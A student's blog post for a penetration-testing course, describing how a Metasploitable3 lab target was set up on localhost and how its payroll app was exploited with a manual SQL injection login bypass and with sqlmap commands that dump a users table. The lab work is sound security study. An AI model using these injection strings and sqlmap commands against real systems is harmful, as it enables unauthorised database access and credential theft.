Penetration testing 1: OWASP 10

This post is about the first assignment in my course on Penetration testing.

I’m running Kali Linux 2018.2 x64 with the Kde-desktop on a HP 655 G1 laptop. I did also use Kali Linux 2018.2 x64 (default) and Xubuntu 18.04.1 x64 form a live-USB but those did not work for this assignment.

You can get your own Kali Linux from here.

You can get your own Xubuntu from here.

DISCLAIMER – This report is purely for penetration testing purposes and does not by any means encourage anyone to do anything illegal or malicious. Please note that I’m not doing anything over the internet, only in my own local network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Try out an OWASP 10 attack of your choosing on your own computer. (scope = localhost)

Metasploitable3

After yesterdays miserable day of working and failing on this assignment I bit the bullet and said goodbye to my beloved Kubuntu and installed Kali Linux on my laptop.

The installation went smoothly without any hassle. I made the live-USB using this guide from Kali Linux.

This time following this guide by Tero worked without problems. As a fast recap here’s what I did

$ sudo apt-get update && sudo apt-get upgrade -y // took around 10 minutes to upgrade
$ sudo apt-get install -y curl virtualbox vagrant
$ mkdir metas
$ cd metas/
$ nano Vagrantfile
 ↓ 
## Vagrantfile 
## http://terokarvinen.com/2018/install-metasploitable-3-vulnerable-target-computer
  Vagrant.configure("2") do |config|
 config.vm.box = "rapid7/metasploitable3-ub1404"
 config.vm.network "forwarded_port", guest: 80, host: 8080
end

$ vagrant up

After the download (took around 15 minutes) I finally got the virtual machine to work!

So lets browse to http://localhost:8080

Screenshot from 2018-08-27 14-15-35

A chat app, Drupal, a payroll app and phpmyadmin.

Let’s get to pentesting!

Manual SQL Injection – payroll_app.php

A php site with two text boxes for login and phpmyadmin was found on the computer? Sounds like a possible target for SQL Injection.

I’ll try out what we did in class last time and insert ‘OR”=’ into the text boxes.

This modifies the SQL string and makes it so the SQL statement is still valid and always true.

'SELECT * FROM tablename WHERE User ="' + user + '" AND Password ="' + password + '"'; 


This is what I’m guessing the sites part of the code that grabs data from the database roughly looks like since this is supposed to be an easy task and easy to solve.

So inserting ‘OR”=’ and running it makes the result statement look like this

SELECT * FROM tablename WHERE User ="'OR''='" AND Password ="'OR''='";

Putting in the correct username and password would result in the statement being true and the app working as intended showing you the rows it’s supposed to. Inserting ‘OR”=’ makes it so the statement is always true and shows all of the rows.

Screenshot from 2018-08-27 14-24-02

Screenshot from 2018-08-27 14-24-23

And there we go, my guess was correct!

But can I find out the passwords of said users?

A lucky guess won’t do. Since we are allowed to use guides I’m going to use one I found. It’s a metasploit3 walkthrough made by mubix, I chose this one because it’s very detailed and thorough.

On page 17 and forward you can find the steps I’m about to try out!

SQLMap

I input the same command as used in the guide but replaced the IP to mine and added :8080 (the forwarded port mentioned earlier in the Vagrantfile).

hacker@kaliroope:~$ sqlmap -u http://ip.ad.re.ss:8080/payroll_app.php --data="user=admin&password=admin&s=OK"
.
.
.
[14:54:31] [WARNING] applying generic concatenation (CONCAT)
[14:54:31] [INFO] target URL appears to be UNION injectable with 4 columns
[14:54:31] [INFO] POST parameter 'user' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[14:54:31] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

“user” is vulnerable. Do I want to keep testing? Yes.

[14:59:35] [INFO] testing 'Oracle AND time-based blind'
[14:59:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:59:35] [INFO] POST parameter 'password' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[14:59:35] [INFO] checking if the injection point on POST parameter 'password' is a false positive
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

“password” is vulnerable, Y, keep testing. The program asks to choose from [0], [1] or [q]. Lets see what the guide says. Switching over to SQLMap Shell, so select [q] to quit the program for now. Access SQLMap Shell by adding –sqlmap-shell to our command and when inside use –dump to show the database dump.

sqlmap -u http://ip.ad.re.ss:8080/payroll_app.php --data="user=admin&password=admin&s=OK" --sqlmap-shell

 

Screenshot from 2018-08-27 15-08-32.png

The guide says nothing about which he chose so lets just go with [0] – user.

Screenshot from 2018-08-27 15-11-58

And there we go, the data from database “payroll” table “users”!

I did try selecting [1] (password) and it gave out the same output. If I understood correctly this means that both parts of code (of the payroll app) that grab the info from the database are vulnerable and that’s what SQLMap takes advantage of.

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is my first day of working with this assignment. Nothing worked out and I had to give up. Instead of deleting it I moved it to the end of the report since a nice example of how sometimes nothing works out.

1)

Metasploitable3

I want to try out the Metasploitable 3 practice target for this assingment so lets install the prerequisites

$ sudo apt-get install vagrant virtualbox curl -y

Then lets make the directory for the virtual machine and create a vagrantfile, inside insert the same as Tero did in on his guide.

$ mkdir metasploitable3
$ cd metasploitable3/
$ nano Vagrantfile
         ↓
## Vagrantfile
## http://terokarvinen.com/2018/install-metasploitable-3-vulnerable-target-computer
 Vagrant.configure("2") do |config|
   config.vm.box = "rapid7/metasploitable3-ub1404"
   config.vm.network "forwarded_port", guest: 80, host: 8080
end

Boot it up!

$ vagrant up

And after waiting for a good 15 minutes for the machine to start up virtualbox is not working correctly. As I’m pretty low on time, I’ll switch over to Xubuntu 18.04.1 x64 where I know this should work.

I repeated the same steps and tried again. Did not work any better. Tried another computer, still error after error.

After a good hour of research I found out that Metasploitable3 requires 65gb of space, which is not possible at the moment since I’m using a live-USB. So Metasploitable3 is not an option at this time since I really need to get this assignment done.

WebGoat

OWASP has a vulnerable testdummy so lets see if it works.

 $ git clone https://github.com/WebGoat/WebGoat#webgoat-8-a-deliberately-insecure-web-application

I’m going to use Vagrant to boot this up so let’s install the prerequisites and try starting it.

$ sudo apt-get install vagrant virtualbox
$ cd WebGoat/webgoat-images/vagrant-training
$ vagrant up

Screenshot_2018-08-26_19-36-24.png

Not working.

An hour of troubleshooting later I’m afraid I have to give up on this one as well.

Thoughts at this point

I never got to actually try out any pentesting today since even after 6-ish hours of achieving absolutely nothing I haven’t gotten a working target up.

Just heard from a classmate that to get Metasploit3 working he had installed Xubuntu 18.04.1. But that option is not actually possible for me right at this moment.

As a side note while trying to find a target I did find this pretty nifty website about SQL Injection, you could even try it out and all. So I guess I did actually get to try out a bit of penetration testing.

That’s it for today.

Advertisements

One thought on “Penetration testing 1: OWASP 10”

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s